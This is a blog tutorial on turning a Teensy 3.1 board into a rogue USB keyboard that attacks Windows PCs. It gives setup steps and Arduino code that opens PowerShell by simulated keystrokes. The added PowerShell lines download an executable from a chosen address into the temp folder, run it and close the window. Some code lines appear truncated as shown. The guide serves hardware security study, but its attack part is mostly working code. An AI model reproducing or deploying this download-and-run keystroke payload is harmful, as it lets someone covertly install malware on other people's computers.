Linux (28) Python (13) Raspberry Pi (5) Bugs (3) Install (3) C (2) Brainf**k (1) HTML (1) Maths (1) Sorts (1)

Tuesday, 19 December 2017

HID keyboard attacks on Windows with a Teensy 3.1

The Teensy 3.1 is a small USB development board similar to Arduino and can be programmed using the Arduino ide. The Teensy board has the ability to act as a USB HID device like a keyboard or mouse and this is what allows us to exploit most computers as most computers have no security when it comes to keyboards or mice.

Things we will be doing:
  • Install the Arduino ide
  • Install the Teensy libraries
  • Setting up the Teensy
  • Programming the Teensy to run code on the test PC

Installing the Arduino ide:
Download the version of Arduino you need whether it be Linux or Windows.
Download the windows installer and run the .exe file. The setup should be relatively easy to follow.

Download the Arduino archive.
To extract the archive use the command:
tar xf filename.tar.xz

Then run the script using the command:
sudo sh
Make sure you note down where you install Arduino as we need this is the next step.

Installing the Teensy libraries:
Download the version of teensyduino that you need whether it be Linux or Windows.
Download the udev rules file if you are on linux.
To add the udev rules run the command:
sudo cp 49-teensy.rules /etc/udev/rules.d/
Now run the executable that we downloaded before and follow the steps.

Setting up the Teensy:
We need to set the Arduino IDE board to Teensy 3.1/3.2. This can be done by going to tools, board, Teensy 3.1/3.2. We also need to change the USB type to Keyboard. This can be done by going to tools, USB Type, Keyboard.

Programming the Teensy:
Go and check out the documentation provided by pjrc here for emulating a keyboard with the Teensy.

Before we actually start programming the Teensy we need to plan out what we will be doing.
  1. Open powershell
  2. Download and run the executable
  3. Close the window
Step 1(Open powershell):
We need to open powershell which can be done by pressing the keys:
Note that we will need delays within this code so you may have to play around with the size of these as a slow computer will need a longer delay.
int smalldelay = 500;
int largedelay = 5000;
void setup() {} //So far no setup is needed
void send_keys(){ //Reduce repitition in code
    Keyboard.send_now();  //Send current keys
    Keyboard.set_modifier(0);  //Set modifier to no key
    Keyboard.set_key1(0);  //Set key1 to no key
    Keyboard.set_key2(0);  //Set key2 to no key
    Keyboard.send_now();   //Send the blank keys
void press_enter(){ //Reduce repititon in code
    Keyboard.set_key1(KEY_ENTER);  //Set key to enter key
    send_keys();  //Call send_keys function to send the key then clear
void loop() { 
    delay(10000); //Delay for 10 seconds for time to upload code
    Keyboard.set_modifier(MODIFIERKEY_GUI);  //Set modifier to the windows key
    Keyboard.set_key1(KEY_R);  //Set key1 to the key "r"
    send_keys();  //Call send_keys function
    delay(smalldelay);  //Delay to allow windows run box to open
    Keyboard.print("powershell");  //Type the line "powershell"
    press_enter();  //Call press_enter function to press the enter key
    delay(largedelay);  //Delay to allow powershell to open
    Keyboard.print("dir");  //Type "dir" to the powershell
    press_enter();  //Call the press_enter function to press the enter key
    delay(50000);  //Delay for 50 seconds before looping again

This code will powershell and run the command dir(We can remove this later as its only used
as an example).
Note the 10 second delay at the start of the loop is needed otherwise the Teensy will
start to overwrite your code when plugged in.

Step 2 and 3:
To download the executable that we will be running we need to run the following powershell commands:
$client = new-object System.Net.WebClient
start $env:Temp\a.exe

We need to add the following lines of code after the last enter press
Keyboard.print("$client = New-Object System.Net.WebClient");
\"$env:TEMP\\a.exe\") ; start $env:TEMP\\a.exe ; exit");
This will now download a file from wherever you point it at and run the file, it then closes the window.
Note the backslashed before the double quotes is to prevent them from closing the string.

You will most likely have to change the delays within the code as some systems can take a fair amount of time to open powershell which is one of the limitations of the attack.